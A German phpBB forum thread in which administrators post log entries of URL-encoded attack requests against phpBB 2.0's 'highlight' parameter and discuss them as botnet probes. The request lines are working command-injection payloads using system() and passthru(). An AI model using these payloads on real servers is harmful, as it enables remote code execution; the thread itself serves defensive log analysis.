Hallo,
heute habe ich in meinen Logfiles folgende Request-Line gefunden:
"GET /forum/viewtopic.php?t=7050&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527 HTTP/1.0" 200 27847
Decodiert sieht das so aus:
perl -e "print q(jSVowMsd)"
Kann mir jemand sagen, was das für einen Sinn macht, wenn jemand einen Befehl o.a. Form auf meinem Server ausführt? Sonstige typische WGEts usw. fehlten.
Gruss
testit
Nochmal neuartige Wurm-Aufrufe!
Forumsregeln
phpBB 2.0 hat das Ende seiner Lebenszeit überschritten
phpBB 2.0 wird nicht mehr aktiv unterstützt. Insbesondere werden - auch bei Sicherheitslücken - keine Patches mehr bereitgestellt. Der Einsatz von phpBB 2.0 erfolgt daher auf eigene Gefahr. Wir empfehlen einen Umstieg auf phpBB 3.1, welches aktiv weiterentwickelt wird und für welches regelmäßig Updates zur Verfügung gestellt werden.
phpBB 2.0 hat das Ende seiner Lebenszeit überschritten
phpBB 2.0 wird nicht mehr aktiv unterstützt. Insbesondere werden - auch bei Sicherheitslücken - keine Patches mehr bereitgestellt. Der Einsatz von phpBB 2.0 erfolgt daher auf eigene Gefahr. Wir empfehlen einen Umstieg auf phpBB 3.1, welches aktiv weiterentwickelt wird und für welches regelmäßig Updates zur Verfügung gestellt werden.
-
larsneo
- Mitglied
- Beiträge: 2622
- Registriert: 07.03.2002 15:23
- Wohnort: schwäbisch gmünd
- Kontaktdaten:
was ist daran neu?
das highlight-exploit 'highlight=%2527' gibt es in dieser form seit ende dezember (mit den entsprechenden patches) - über das in der zwischenzeit installierte und scheinbar recht umfangreiche bot-netzwerk geht es seitdem vor allem darum, weitere schwachstellen automatisiert abzuprüfen und auszuwerten.
fazit: aktuelle version nutzen um nicht gefährdet zu sein und entsprechende .htaccess aufspielen um traffic zu einzusparen.
das highlight-exploit 'highlight=%2527' gibt es in dieser form seit ende dezember (mit den entsprechenden patches) - über das in der zwischenzeit installierte und scheinbar recht umfangreiche bot-netzwerk geht es seitdem vor allem darum, weitere schwachstellen automatisiert abzuprüfen und auszuwerten.
fazit: aktuelle version nutzen um nicht gefährdet zu sein und entsprechende .htaccess aufspielen um traffic zu einzusparen.
Das ist ja ganz lieb von Dir, dass Du mich darüber aufklärst, dass das nichts Neues ist 
vgl. u.a. meine folgenden Beiträge:
http://www.phpbb.de/viewtopic.php?p=411 ... ht=#411270
http://www.phpbb.de/viewtopic.php?p=460 ... ht=#460899
Für alle anderen:
Die Frage ist, warum ein Request abgesetzt wird, der halt gerade eben nicht darauf abzielt, einen Wurm in Gang zu setzen?
Eine mögliche Antwort:
Die Requests werden abgesetzt, um vorab zu checken, ob der Exploit greifen würde, also die print-Anweisung befolgt würde.
Nette Grüsse
testit
vgl. u.a. meine folgenden Beiträge:
http://www.phpbb.de/viewtopic.php?p=411 ... ht=#411270
http://www.phpbb.de/viewtopic.php?p=460 ... ht=#460899
Für alle anderen:
Die Frage ist, warum ein Request abgesetzt wird, der halt gerade eben nicht darauf abzielt, einen Wurm in Gang zu setzen?
Eine mögliche Antwort:
Die Requests werden abgesetzt, um vorab zu checken, ob der Exploit greifen würde, also die print-Anweisung befolgt würde.
Nette Grüsse
testit
Hallo,
kann jemand testit´s Frage beantworten, welchen Sinn dieser Befehl hat ? Ich hab wahrscheinlich das gleiche Problem - fand in den Logfiles folgendes:
"GET /viewtopic.php?t=%31%30&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20%77%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527 HTTP/1.1" 200 68611 "-" "-"
Hab Version 2.0.13 - daran kann es nicht liegen.
Bringt es etwas, wenn man die entsprechende IP-Nummer bannt ?
Dankeschön im voraus
kann jemand testit´s Frage beantworten, welchen Sinn dieser Befehl hat ? Ich hab wahrscheinlich das gleiche Problem - fand in den Logfiles folgendes:
"GET /viewtopic.php?t=%31%30&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20%77%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527 HTTP/1.1" 200 68611 "-" "-"
Hab Version 2.0.13 - daran kann es nicht liegen.
Bringt es etwas, wenn man die entsprechende IP-Nummer bannt ?
Dankeschön im voraus
IP-Nummern bannen bringt nix, da diese sich ständig ändern! Ausserdem ist der von Dir beschriebene Request nicht identisch mit dem, den ich oben beschrieben habe. Dieser war in der Tat nur ein Test-Request, um zu sehen, ob das Board angegriffen werden könnte.
Dass ein Request wie der von Dir beschriebene in Deinen LOGS auftaucht, heisst noch lange nicht, dass Dein Board noch angreifbar ist. (es muss ja schliesslich nicht auf einen solchen Request reagieren )
Gruss
testit
Dass ein Request wie der von Dir beschriebene in Deinen LOGS auftaucht, heisst noch lange nicht, dass Dein Board noch angreifbar ist. (es muss ja schliesslich nicht auf einen solchen Request reagieren
)Gruss
testit
